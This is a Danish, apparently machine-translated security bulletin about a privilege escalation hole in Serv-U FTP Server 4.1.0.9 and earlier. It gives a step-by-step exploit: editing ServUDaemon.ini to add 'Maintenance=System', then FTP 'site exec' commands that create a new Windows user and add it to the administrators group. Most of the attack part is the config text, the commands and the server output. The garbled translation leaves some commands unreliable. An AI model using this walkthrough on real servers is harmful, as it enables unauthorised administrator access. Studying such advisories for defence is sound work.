Lokale forhøjede privilegier: Ja
Remote forhøjede privilegier: Ja
Brug forudsætninger: Serv-U-profil på en modificeret tilladelser
Disclaimer: Dette er blot et privilegium optrapning ideer og metoder.
1, den berørte software
Serv-U FTP Server 4.1.0.9 (og alle tidligere versioner)
For det andet, det berørte system
Alle versioner af Microsoft Windows Server 2003
Alle versioner af Microsoft Windows XP
Alle versioner af Microsoft Windows 2000
Alle versioner af Microsoft Windows NT
For det tredje anmeldelse
Serv-U FTP Server til RhinoSoft produceret en Ftp Sserver software, der nu i vid udstrækning anvendes i hele verden. Efter jeg fandt, Serv-U FTP Server opsætningsfil gemmes i Serv-U FTP Server fil bibliotek ServUDaemon.ini fil. Hvis den lokale eller fjernbrugere har begrænsede rettigheder til almindelig kontakt med en hacker at konstruere filen og grundigt dokument indholdet af ServUDaemon.ini Ftp proces kan bruge systemet til at afvikle vilkårlige kommandoer SYSTEM.
4, defekt analyse:
Serv-U FTP Server vil sætte brugeren konfigurationen er gemt og senere ServUDaemon.ini fil. Herunder brugerens ret til information og adgang til bibliotek information. Lokale begrænset bruger eller en ekstern hacker at læse og skrive, så længe Serv-U FTP Server fil bibliotek, kan du redigere filer i det bibliotek ServUDaemon.ini Ftp proces realiseret fjernbetjeningen, det lokale system administrator rettigheder til FTP afvikle vilkårlige kommandoer. System version og ikke er omfattet af virkningen. (Bruger Info Vælg "oplagring og den ordning indskrive" uden dette har påvirket fejl)
5, testmetode:
1, lokale test
Antag en lokal begrænset bruger kan gennemse Serv-U FTP Server fil bibliotek. Find ServUDaemon.ini fil. Brug Notesblok til at åbne den generelle indhold af det originale dokument som:
[GLOBAL]
Version = 4.1.0.0 / / Serv-U FTP Server version nummer
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[Domæner]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 file / / host IP og domænenavn, havneforhold
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c: / / kan gennemse biblioteket
TimeOut = 600
Access1 = C: | RWAMLCDP
Hvis ServUDaemon.in fil ændres således:
[GLOBAL]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[Domæner]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domain1]
User1 = zihuan | 1 | 0
[USER = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c:
TimeOut = 600
Vedligeholdelse = System file / / Tilladelser type
Access1 = C: | RWAMELCDP
Ovenstående, mere end det oprindelige indhold af en "Vedligeholdelse = System" gemme efter redigering. Brug derefter Ftp login til Serv-U FTP Server efter gennemførelsen af den næste befale:
ftp åbne ip
Forbundet til ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock klar ...
Bruger (ip: (ingen)): id-fil / / bruger input-struktur
331 Brugernavn okay, så send venligst udfylde E-mail-adresse som adgangskode.
Password: password file / / password
230 Bruger logget ind, fortsæt.
ftp cd winnt file / / i win2k den winnt biblioteket, hvis det er winxp eller Windows Server 2003, bør vinduerne bibliotek.
250 Directory skiftet til / WINNT
ftp cd system32 fil / / i system32 mappen
250 Directory skiftet til / WINNT/system32
ftp citerer site exec net.exe bruger zihuan ziHUAN / add file / / brug system net.exe filer plus brugeren.
200 EXEC command successful (TID = 33).
ftp citerer site exec net.exe localhost administratorer zihuan / add file / / opgradere til superbruger
Denne stigning i det lokale system, en adgangskode til zihuan: ziHUAN superbruger. Kan også direkte citere site exec net.exe localhost administratorer bruger / add kommandoen til den aktuelle bruger til at opgradere til super bruger gruppen til at gå. Selvfølgelig kan du udføre enhver kommando på systemet.
Erklæring:
Bøger kun at beskrive de mulige sikkerhedsproblemer, forfatteren og hackere X Files magazine denne sikkerhedsbulletin er ikke at give nogen garanti eller løfte. Da spredningen af brugen af oplysningerne i denne artikel, et resultat af direkte eller indirekte følger af tabet af brugeren selv er ansvarlig for, har forfatteren ikke påtage sig noget ansvar for dette. Forfattere har revideret denne sikkerhedsbulletin og fortolkning. For denne artikel, reproduceres eller overføres, for at sikre integritet i denne artikel, herunder meddelelse om ophavsret og alle andre indhold. Tilladt uden ophavsmandens må ikke ændre eller ændre nogen af indholdet af denne artikel meddelelse.